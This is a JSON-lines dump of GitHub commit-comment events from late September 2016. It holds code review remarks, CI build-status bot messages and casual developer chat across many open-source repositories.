{"id":"4637821148","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"ProximoSrl/Jarvis.DocumentStore"},"payload":{"comment":{"id":19225358,"position":null,"line":null,"path":null,"commit_id":"aa7b43d1ca16f9d5de4e98339057368ba7301ee2","created_at":"2016-09-29T15:01:17Z","updated_at":"2016-09-29T15:01:17Z","body":"TeamCity Jarvis :: Jarvis.DocumentStore :: GitFlow Debug / Test / Release [Build 3.0.0-beta.1+5](http://build.prxm.it:8811/viewLog.html?buildId=9848&buildTypeId=Jarvis_DocumentStore_GitVersion) outcome was **FAILURE**\nSummary: Tests passed: 269; exit code 1 Build time: 00:09:54"}},"created_at":"2016-09-29T15:01:17Z"}
{"id":"4637828086","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19225370,"position":null,"line":null,"path":null,"commit_id":"3a9acebe5c525978872eb22aa1f37245a1d428d3","created_at":"2016-09-29T15:02:18Z","updated_at":"2016-09-29T15:02:18Z","body":"yep don't worry, just joking ^^\r\n\r\n"}},"created_at":"2016-09-29T15:02:18Z"}
{"id":"4637828205","type":"CommitCommentEvent","actor":{"login":"LEGOlord208"},"repo":{"name":"LEGOlord208/PixelCamMod"},"payload":{"comment":{"id":19225371,"position":null,"line":null,"path":null,"commit_id":"4eaeaf263630d1d20951380439efca58a1cbe3d2","created_at":"2016-09-29T15:02:19Z","updated_at":"2016-09-29T15:02:19Z","body":"Ah :P"}},"created_at":"2016-09-29T15:02:19Z"}
{"id":"4637830629","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"donflora/final-project"},"payload":{"comment":{"id":19225379,"position":68,"line":68,"path":"index.html","commit_id":"fbef8d011a6dd28d0e0a6bcb9dff98275e1e2a92","created_at":"2016-09-29T15:02:39Z","updated_at":"2016-09-29T15:02:39Z","body":"Try to avoid empty elements like this. "}},"created_at":"2016-09-29T15:02:39Z"}
{"id":"4637832592","type":"CommitCommentEvent","actor":{"login":"infabo"},"repo":{"name":"mswebdesign/Itabs_Invoice"},"payload":{"comment":{"id":19225382,"position":null,"line":null,"path":null,"commit_id":"6ed1d5198050661a74510c5a88f8345d495ee1e9","created_at":"2016-09-29T15:02:57Z","updated_at":"2016-09-29T15:02:57Z","body":"funny this 🍭 "}},"created_at":"2016-09-29T15:02:57Z"}
{"id":"4637833613","type":"CommitCommentEvent","actor":{"login":"claudioandre"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19225391,"position":null,"line":null,"path":null,"commit_id":"7b47e453b4207fd758a2e2d2f5c642c15a8f32a6","created_at":"2016-09-29T15:03:08Z","updated_at":"2016-09-29T15:03:08Z","body":"A few notes:\r\n  1. the problem happens even for a ```-list=opencl-devices```\r\n  2. as I wrote once, it is possible to use CPU OpenCL when the AMD driver is installed; but you'll see modprobe errors.\r\n  3. seems reasonable to suppose there is some fd variable uninitialized when these modprobe errors happens.\r\n  4. then ASAN detects the SEGV with NULL.\r\n\r\nNot much we can do on CI since the problem happens while listing the available platforms => 100% AMD closed souce.\r\n```\r\n#16 0xabee7e in start_opencl_environment /home/travis/build/claudioandre/JohnTheRipper/src/common-opencl.c:428:2\r\n```\r\nExactly at clGetPlatformIDs(...);\r\n****\r\nThat said:\r\n- On Travis, I'll enable ASAN for GCC only.\r\n"}},"created_at":"2016-09-29T15:03:08Z"}
{"id":"4637833804","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"donflora/final-project"},"payload":{"comment":{"id":19225392,"position":21,"line":21,"path":"js/index.js","commit_id":"fbef8d011a6dd28d0e0a6bcb9dff98275e1e2a92","created_at":"2016-09-29T15:03:10Z","updated_at":"2016-09-29T15:03:10Z","body":"array of arrays!"}},"created_at":"2016-09-29T15:03:10Z"}
{"id":"4637835108","type":"CommitCommentEvent","actor":{"login":"tittyboi"},"repo":{"name":"tittyboi/Jimm-Beans"},"payload":{"comment":{"id":19225397,"position":null,"line":null,"path":null,"commit_id":"7e625adfe6d42aef5a2267ee9591bcf50c5620b0","created_at":"2016-09-29T15:03:21Z","updated_at":"2016-09-29T15:03:21Z","body":"👽"}},"created_at":"2016-09-29T15:03:21Z"}
{"id":"4637836328","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19225400,"position":null,"line":null,"path":null,"commit_id":"370c8f58660614ee150d2ff80157e4ff04f429bc","created_at":"2016-09-29T15:03:32Z","updated_at":"2016-09-29T15:03:32Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1200](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14577&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-29T15:03:32Z"}
{"id":"4637836814","type":"CommitCommentEvent","actor":{"login":"infabo"},"repo":{"name":"mswebdesign/Itabs_Invoice"},"payload":{"comment":{"id":19225402,"position":5,"line":62,"path":"src/app/code/community/Itabs/Invoice/Model/Validation.php","commit_id":"6ed1d5198050661a74510c5a88f8345d495ee1e9","created_at":"2016-09-29T15:03:37Z","updated_at":"2016-09-29T15:03:37Z","body":"funny this 🌽 "}},"created_at":"2016-09-29T15:03:37Z"}
{"id":"4637841862","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"donflora/final-project"},"payload":{"comment":{"id":19225419,"position":34,"line":34,"path":"js/index.js","commit_id":"fbef8d011a6dd28d0e0a6bcb9dff98275e1e2a92","created_at":"2016-09-29T15:04:21Z","updated_at":"2016-09-29T15:04:21Z","body":"There's probably a way to combine the first array and this into an object that's a little more organized. Look into JS Objects and a good use might come to mind. "}},"created_at":"2016-09-29T15:04:21Z"}
{"id":"4637847681","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19225431,"position":null,"line":null,"path":null,"commit_id":"370c8f58660614ee150d2ff80157e4ff04f429bc","created_at":"2016-09-29T15:05:14Z","updated_at":"2016-09-29T15:05:14Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1200](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14577&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **UNKNOWN**\nSummary: Canceled (Exit code 137 (new)) Build time: 00:01:42"}},"created_at":"2016-09-29T15:05:14Z"}
{"id":"4637849028","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19225435,"position":null,"line":null,"path":null,"commit_id":"ae7695929c2b6168166e21513d862bd37b5f02d4","created_at":"2016-09-29T15:05:27Z","updated_at":"2016-09-29T15:05:27Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1201](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14580&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-29T15:05:27Z"}
{"id":"4637851735","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19225442,"position":null,"line":null,"path":null,"commit_id":"991a2852ae319fcbd83e2f08644ef657a56708a1","created_at":"2016-09-29T15:05:51Z","updated_at":"2016-09-29T15:05:51Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1202](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14581&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-29T15:05:51Z"}
{"id":"4637852452","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19225444,"position":null,"line":null,"path":null,"commit_id":"ae7695929c2b6168166e21513d862bd37b5f02d4","created_at":"2016-09-29T15:05:58Z","updated_at":"2016-09-29T15:05:58Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1201](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14580&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:00:31"}},"created_at":"2016-09-29T15:05:58Z"}
{"id":"4637856095","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19225454,"position":null,"line":null,"path":null,"commit_id":"991a2852ae319fcbd83e2f08644ef657a56708a1","created_at":"2016-09-29T15:06:31Z","updated_at":"2016-09-29T15:06:31Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1202](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14581&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:00:40"}},"created_at":"2016-09-29T15:06:31Z"}
{"id":"4637857706","type":"CommitCommentEvent","actor":{"login":"popcornmix"},"repo":{"name":"raspberrypi/firmware"},"payload":{"comment":{"id":19225459,"position":null,"line":null,"path":null,"commit_id":"ad8608c08b122b2c228dba0ff5070d6e9519faf5","created_at":"2016-09-29T15:06:45Z","updated_at":"2016-09-29T15:06:45Z","body":"https://www.raspberrypi.org/forums/viewtopic.php?f=63&t=160578&p=1041096"}},"created_at":"2016-09-29T15:06:45Z"}
{"id":"4637864695","type":"CommitCommentEvent","actor":{"login":"nickstenning"},"repo":{"name":"hypothesis/h"},"payload":{"comment":{"id":19225471,"position":6,"line":201,"path":"h/static/scripts/controllers/form-controller.js","commit_id":"43b75081e44335c8f8c0a3385e1f63201e85818a","created_at":"2016-09-29T15:07:48Z","updated_at":"2016-09-29T15:07:48Z","body":"Uhhhh.. are there situations where we are assigning non-unique IDs to elements in a page? Because that's not ok."}},"created_at":"2016-09-29T15:07:48Z"}
{"id":"4637869537","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19225487,"position":null,"line":null,"path":null,"commit_id":"ae7695929c2b6168166e21513d862bd37b5f02d4","created_at":"2016-09-29T15:08:31Z","updated_at":"2016-09-29T15:08:31Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1203](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14587&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-29T15:08:31Z"}
{"id":"4637870235","type":"CommitCommentEvent","actor":{"login":"dustinmm80"},"repo":{"name":"conjurinc/api-python"},"payload":{"comment":{"id":19225490,"position":45,"line":22,"path":"examples/petstore/docker-compose.yml","commit_id":"a354f54538c8fd8468addc2f0ad1c35d85570b8d","created_at":"2016-09-29T15:08:37Z","updated_at":"2016-09-29T15:08:37Z","body":"I know we can get it working w/ virtualenv easily. We can create another story for that, since AC for this story didn't include running automated tests against the example. That way, we keep the example easy to understand and feels more 'python-native'."}},"created_at":"2016-09-29T15:08:37Z"}
{"id":"4637870315","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19225491,"position":null,"line":null,"path":null,"commit_id":"370c8f58660614ee150d2ff80157e4ff04f429bc","created_at":"2016-09-29T15:08:38Z","updated_at":"2016-09-29T15:08:38Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1204](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14590&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-29T15:08:38Z"}
{"id":"4637871143","type":"CommitCommentEvent","actor":{"login":"lautr3k"},"repo":{"name":"openhardwarecoza/LaserWeb4"},"payload":{"comment":{"id":19225492,"position":null,"line":null,"path":null,"commit_id":"28e35bcd683316fca3fc6e6e11d0d086d86cd99d","created_at":"2016-09-29T15:08:46Z","updated_at":"2016-09-29T15:08:46Z","body":"This is just for the first commit, dist/ and docs/ should not commited often and must be commited alone."}},"created_at":"2016-09-29T15:08:46Z"}
{"id":"4637878265","type":"CommitCommentEvent","actor":{"login":"kirkshoop"},"repo":{"name":"gchudnov/RxCpp"},"payload":{"comment":{"id":19225506,"position":47,"line":191,"path":"Rx/v2/test/operators/debounce.cpp","commit_id":"5330a34c6503822199b432ca6ec5fa45205af07b","created_at":"2016-09-29T15:09:50Z","updated_at":"2016-09-29T15:09:50Z","body":"I would prefer to see observable_member overloads that work for both arrangements, rather than break existing code.."}},"created_at":"2016-09-29T15:09:50Z"}
{"id":"4637879776","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19225513,"position":null,"line":null,"path":null,"commit_id":"ae7695929c2b6168166e21513d862bd37b5f02d4","created_at":"2016-09-29T15:10:04Z","updated_at":"2016-09-29T15:10:04Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1203](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14587&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:01:32"}},"created_at":"2016-09-29T15:10:04Z"}
{"id":"4637879792","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19225514,"position":null,"line":null,"path":null,"commit_id":"2766b2883c636c0bf5b94decf642df3b57452f42","created_at":"2016-09-29T15:10:04Z","updated_at":"2016-09-29T15:10:04Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1205](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14588&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-29T15:10:04Z"}
{"id":"4637883235","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"donflora/final-project"},"payload":{"comment":{"id":19225525,"position":null,"line":null,"path":null,"commit_id":"fbef8d011a6dd28d0e0a6bcb9dff98275e1e2a92","created_at":"2016-09-29T15:10:34Z","updated_at":"2016-09-29T15:10:34Z","body":"I'm very impressed with the map markers functionality; it's no small feat to pull that off but you did it well. Be careful to keep your markup semantic and avoid using empty elements in order to add a border or clear content. The SVG animation is impressive. Triggering the animation is complicated by the complexity of the SVG markup and generated styles. Keep it up!"}},"created_at":"2016-09-29T15:10:34Z"}
{"id":"4637884536","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19225532,"position":null,"line":null,"path":null,"commit_id":"2766b2883c636c0bf5b94decf642df3b57452f42","created_at":"2016-09-29T15:10:45Z","updated_at":"2016-09-29T15:10:45Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1205](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14588&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:40"}},"created_at":"2016-09-29T15:10:45Z"}
{"id":"4637889798","type":"CommitCommentEvent","actor":{"login":"kirkshoop"},"repo":{"name":"gchudnov/RxCpp"},"payload":{"comment":{"id":19225543,"position":9,"line":738,"path":"Rx/v2/src/rxcpp/rx-util.hpp","commit_id":"5330a34c6503822199b432ca6ec5fa45205af07b","created_at":"2016-09-29T15:11:35Z","updated_at":"2016-09-29T15:11:35Z","body":"If you restructure a bit to use `rxu::decay_t` you should be able to reduce the specializations here to 2. some of the existing is_... do this. "}},"created_at":"2016-09-29T15:11:35Z"}
{"id":"4637889839","type":"CommitCommentEvent","actor":{"login":"robertknight"},"repo":{"name":"hypothesis/h"},"payload":{"comment":{"id":19225544,"position":6,"line":201,"path":"h/static/scripts/controllers/form-controller.js","commit_id":"43b75081e44335c8f8c0a3385e1f63201e85818a","created_at":"2016-09-29T15:11:35Z","updated_at":"2016-09-29T15:11:35Z","body":"Yes - https://hypothes.is/account/settings"}},"created_at":"2016-09-29T15:11:35Z"}
{"id":"4637890350","type":"CommitCommentEvent","actor":{"login":"ivan-mogilko"},"repo":{"name":"adventuregamestudio/ags"},"payload":{"comment":{"id":19225547,"position":34,"line":277,"path":"Common/game/main_game_file.cpp","commit_id":"88093d34d7fb2033f9d367d2d82d2df0b5d6a6c8","created_at":"2016-09-29T15:11:40Z","updated_at":"2016-09-29T15:11:40Z","body":"IIRC it's not memory leak, it is rather memory corruption that may occur, so thanks for pointing out. I will fix this."}},"created_at":"2016-09-29T15:11:40Z"}
{"id":"4637897213","type":"CommitCommentEvent","actor":{"login":"doiphode"},"repo":{"name":"doiphode/moodle_local_mass_enroll"},"payload":{"comment":{"id":19225568,"position":null,"line":null,"path":null,"commit_id":"0c61b078400796022338184967434842f4cafa0e","created_at":"2016-09-29T15:12:43Z","updated_at":"2016-09-29T15:12:43Z","body":"There was a small bug in the code that was leading to a serious problem. If there is a blank record in the CSV, the plugin tries to match with existing blank idnumbers, email address or username in user table and enrols the very first blank record, in which case the Guest gets enrolled because it is before everyone in the mdl_user table whose idnumber is blank. "}},"created_at":"2016-09-29T15:12:43Z"}
{"id":"4637897928","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19225571,"position":null,"line":null,"path":null,"commit_id":"2766b2883c636c0bf5b94decf642df3b57452f42","created_at":"2016-09-29T15:12:50Z","updated_at":"2016-09-29T15:12:50Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1206](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14592&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-29T15:12:50Z"}
{"id":"4637901608","type":"CommitCommentEvent","actor":{"login":"imcaffrey"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19225577,"position":null,"line":null,"path":null,"commit_id":"a3548e8959ba02bc66e4aa81e4708da7b425f4aa","created_at":"2016-09-29T15:13:20Z","updated_at":"2016-09-29T15:13:20Z","body":"防spam吗  少侠blog里面@换成了# 之前我都是到处找别人的email来commit with 没有意识到这样的习惯QAQ"}},"created_at":"2016-09-29T15:13:20Z"}
{"id":"4637902640","type":"CommitCommentEvent","actor":{"login":"robertknight"},"repo":{"name":"hypothesis/h"},"payload":{"comment":{"id":19225582,"position":6,"line":201,"path":"h/static/scripts/controllers/form-controller.js","commit_id":"43b75081e44335c8f8c0a3385e1f63201e85818a","created_at":"2016-09-29T15:13:31Z","updated_at":"2016-09-29T15:13:31Z","body":"Deform generates field IDs of the form `deformFieldN` where N is a counter that starts from 1 for each form on the page."}},"created_at":"2016-09-29T15:13:31Z"}
{"id":"4637904614","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19225589,"position":null,"line":null,"path":null,"commit_id":"2766b2883c636c0bf5b94decf642df3b57452f42","created_at":"2016-09-29T15:13:48Z","updated_at":"2016-09-29T15:13:48Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1206](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14592&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:59"}},"created_at":"2016-09-29T15:13:48Z"}
{"id":"4637906054","type":"CommitCommentEvent","actor":{"login":"frank-trampe"},"repo":{"name":"fontforge/fontforge.github.io"},"payload":{"comment":{"id":19225592,"position":12,"line":24,"path":"en-US/downloads/windows.md","commit_id":"48ca596da97fe7dfcc2d0df9c2296307f727ae44","created_at":"2016-09-29T15:14:01Z","updated_at":"2016-09-29T15:14:01Z","body":"I know it's a lot of clicks, but easy downloading isn't our only priority. Use of ancient FontForge versions continues to generate bad user experiences and spurious GitHub issues and to limit our opportunities for user engagement. I want everybody downloading to be forced at least to initiate the subscription process.\r\n\r\nThis may adversely impact download counts for the next release cycle, but, in the long run, it will increase them via direct reminders and also through improved user experience from using more modern releases. It also gives us an opportunity to run a Kickstarter campaign if we come up with a new feature of sufficient interest to the community.\r\n"}},"created_at":"2016-09-29T15:14:01Z"}
{"id":"4637907626","type":"CommitCommentEvent","actor":{"login":"rix1337"},"repo":{"name":"rix1337/docker-rsscrawler"},"payload":{"comment":{"id":19225596,"position":null,"line":null,"path":null,"commit_id":"2304f4a5535d2c2625e5f5a38c80d6d3af979788","created_at":"2016-09-29T15:14:15Z","updated_at":"2016-09-29T15:14:15Z","body":"Gesagt, getan:\r\nhttps://github.com/rix1337/RSScrawler/commit/37f485210a48f8d61aba920e095f79b14e7139f8"}},"created_at":"2016-09-29T15:14:15Z"}
{"id":"4637912137","type":"CommitCommentEvent","actor":{"login":"vire"},"repo":{"name":"babel/babel"},"payload":{"comment":{"id":19225622,"position":4,"line":13,"path":"packages/babel-register/src/node.js","commit_id":"aa0aada8ad136c7d932eb04b4dd405e55b5c3fa7","created_at":"2016-09-29T15:14:59Z","updated_at":"2016-09-29T15:14:59Z","body":"This had cost me a half day of debugging"}},"created_at":"2016-09-29T15:14:59Z"}
{"id":"4637912461","type":"CommitCommentEvent","actor":{"login":"weerd"},"repo":{"name":"DoSomething/onboarding-service"},"payload":{"comment":{"id":19225623,"position":5,"line":5,"path":"README.md","commit_id":"9e1d3c4da6a4ca010971ebe837f5ff27e01aba29","created_at":"2016-09-29T15:15:01Z","updated_at":"2016-09-29T15:15:01Z","body":"Is there no Vagrant alternative?"}},"created_at":"2016-09-29T15:15:01Z"}
{"id":"4637914930","type":"CommitCommentEvent","actor":{"login":"kirkshoop"},"repo":{"name":"gchudnov/RxCpp"},"payload":{"comment":{"id":19225628,"position":326,"line":205,"path":"Rx/v2/src/rxcpp/operators/rx-debounce.hpp","commit_id":"5330a34c6503822199b432ca6ec5fa45205af07b","created_at":"2016-09-29T15:15:24Z","updated_at":"2016-09-29T15:15:24Z","body":"I think that I am going to be able to put a single generic factory type into `rx-operators.hpp` that takes the tag type and then does the rest the same way every time."}},"created_at":"2016-09-29T15:15:24Z"}
{"id":"4637917783","type":"CommitCommentEvent","actor":{"login":"danez"},"repo":{"name":"babel/babel"},"payload":{"comment":{"id":19225639,"position":4,"line":13,"path":"packages/babel-register/src/node.js","commit_id":"aa0aada8ad136c7d932eb04b4dd405e55b5c3fa7","created_at":"2016-09-29T15:15:49Z","updated_at":"2016-09-29T15:15:49Z","body":"Yes me too :("}},"created_at":"2016-09-29T15:15:49Z"}
{"id":"4637924417","type":"CommitCommentEvent","actor":{"login":"kkashojj-proj"},"repo":{"name":"yateenkedare/CarpoolManagementSystem"},"payload":{"comment":{"id":19225666,"position":null,"line":null,"path":null,"commit_id":"e37816b78d0c824810b7d3c3b6d7a01d52f470f5","created_at":"2016-09-29T15:16:52Z","updated_at":"2016-09-29T15:16:52Z","body":"Edited"}},"created_at":"2016-09-29T15:16:52Z"}
{"id":"4637925376","type":"CommitCommentEvent","actor":{"login":"gnodet"},"repo":{"name":"apache/karaf"},"payload":{"comment":{"id":19225669,"position":null,"line":null,"path":null,"commit_id":"63474103dac5eaaab896ce4f46bde47544f1fcb9","created_at":"2016-09-29T15:17:00Z","updated_at":"2016-09-29T15:17:00Z","body":"Any reason to not use RELEASE instead of LATEST ?\r\nLATEST includes snapshots, which is usually not a good idea..."}},"created_at":"2016-09-29T15:17:00Z"}
{"id":"4637927271","type":"CommitCommentEvent","actor":{"login":"AndreyTsvetkov"},"repo":{"name":"Traveler59/test"},"payload":{"comment":{"id":19225676,"position":1,"line":1,"path":"src/knockout.d.ts","commit_id":"11d39fe8a82a120adb0760e57dbf45bddca819c9","created_at":"2016-09-29T15:17:17Z","updated_at":"2016-09-29T15:17:17Z","body":"d.ts usually are placed in a subfolder. for one file it is ok, for more ones it's better to use npm to manage these dependencies"}},"created_at":"2016-09-29T15:17:17Z"}
{"id":"4637932261","type":"CommitCommentEvent","actor":{"login":"Diman3589"},"repo":{"name":"Diman3589/triangle"},"payload":{"comment":{"id":19225691,"position":25,"line":24,"path":"Triangle/Triangle/Program.cs","commit_id":"9e895924f4471112a5c477f06084f3c22f2a6a83","created_at":"2016-09-29T15:18:02Z","updated_at":"2016-09-29T15:18:02Z","body":"Итак, сравнение factory method и public constructor. \r\nВ данном решении, конечно, логичней использовать factory method, поскольку это экономит память - не нужно создавать несколько структур, а также упрощает понимание кода. На [форуме](stackoverflow.com/questions/628950/constructors-vs-factory-methods#answer-628959) хорошо объясняется когда нужно использовать фабрику. Но, данное решение все равно спорное."}},"created_at":"2016-09-29T15:18:02Z"}
{"id":"4637933897","type":"CommitCommentEvent","actor":{"login":"bholmes"},"repo":{"name":"xamarin/GoogleApisForiOSComponents"},"payload":{"comment":{"id":19225693,"position":null,"line":null,"path":null,"commit_id":"4110d5570c36b1637ff2b0aba1653175ae828d8d","created_at":"2016-09-29T15:18:16Z","updated_at":"2016-09-29T15:18:16Z","body":"@dhaligas \r\n\r\nWe did discuss this internally and decided to keep these the same for the time being.  \r\n\r\n 1. We are behind on several updates with respect to Google and needed to get this and others out quickly. \r\n 2. We feel the linker will remove the code that is not needed in release device configurations.  The size diff may not be significant in the end.\r\n 3. We have seen Google seperate libraries in the past just to put them back together.  I wanted to give it some time so that we were not undoing this split later.\r\n\r\nIn the near future we intend to revisit this decision.  \r\n\r\n@SotoiGhost can you create an issue for this in the repo so we do not forget?\r\n"}},"created_at":"2016-09-29T15:18:16Z"}
{"id":"4637935589","type":"CommitCommentEvent","actor":{"login":"AndreyTsvetkov"},"repo":{"name":"Traveler59/test"},"payload":{"comment":{"id":19225700,"position":11,"line":11,"path":"src/script.ts","commit_id":"11d39fe8a82a120adb0760e57dbf45bddca819c9","created_at":"2016-09-29T15:18:32Z","updated_at":"2016-09-29T15:18:32Z","body":"the name `num` is unclear. please give more decriptive name"}},"created_at":"2016-09-29T15:18:32Z"}
{"id":"4637936096","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19225701,"position":null,"line":null,"path":null,"commit_id":"bede691978b18be976ea97492216307b28885e88","created_at":"2016-09-29T15:18:36Z","updated_at":"2016-09-29T15:18:36Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1207](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14594&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-29T15:18:36Z"}
{"id":"4637936160","type":"CommitCommentEvent","actor":{"login":"robske110"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19225702,"position":null,"line":null,"path":null,"commit_id":"2b022d9a04c2856025e7f9f375bbaaadd38f46d2","created_at":"2016-09-29T15:18:37Z","updated_at":"2016-09-29T15:18:37Z","body":"@kam187 consider finally fixing your local email settings :)"}},"created_at":"2016-09-29T15:18:37Z"}
{"id":"4637936755","type":"CommitCommentEvent","actor":{"login":"gnodet"},"repo":{"name":"apache/karaf"},"payload":{"comment":{"id":19225704,"position":null,"line":null,"path":null,"commit_id":"6b9559016fde75dac6806598dc7b469bc00c928e","created_at":"2016-09-29T15:18:42Z","updated_at":"2016-09-29T15:18:42Z","body":"Any reason to use LATEST instead of RELEASE like the other repositories ?"}},"created_at":"2016-09-29T15:18:42Z"}
{"id":"4637938102","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19225713,"position":null,"line":null,"path":null,"commit_id":"806e00434c34aa6c3911c2148292902f2782ffdb","created_at":"2016-09-29T15:18:54Z","updated_at":"2016-09-29T15:18:54Z","body":"The rest of the code takes a measure and a context as separate arguments -- it's a bad idea to introduce a new calling convention for disint.  You can genuinely agree that our calling convention is sub-optimal -- but it should be fixed throughout and not piecemeal.  Please restore that part, for now."}},"created_at":"2016-09-29T15:18:54Z"}
{"id":"4637939173","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19225716,"position":null,"line":null,"path":null,"commit_id":"bede691978b18be976ea97492216307b28885e88","created_at":"2016-09-29T15:19:04Z","updated_at":"2016-09-29T15:19:04Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1207](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14594&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:28"}},"created_at":"2016-09-29T15:19:04Z"}
{"id":"4637941068","type":"CommitCommentEvent","actor":{"login":"weerd"},"repo":{"name":"DoSomething/onboarding-service"},"payload":{"comment":{"id":19225723,"position":5,"line":5,"path":"README.md","commit_id":"9e1d3c4da6a4ca010971ebe837f5ff27e01aba29","created_at":"2016-09-29T15:19:21Z","updated_at":"2016-09-29T15:19:21Z","body":"Maybe not cause it's a Heroku thing? :shrug:"}},"created_at":"2016-09-29T15:19:21Z"}
{"id":"4637947160","type":"CommitCommentEvent","actor":{"login":"AndreyTsvetkov"},"repo":{"name":"Traveler59/test"},"payload":{"comment":{"id":19225738,"position":29,"line":29,"path":"src/script.ts","commit_id":"11d39fe8a82a120adb0760e57dbf45bddca819c9","created_at":"2016-09-29T15:20:17Z","updated_at":"2016-09-29T15:20:17Z","body":"why `any`? we should use the more strong types we can"}},"created_at":"2016-09-29T15:20:17Z"}
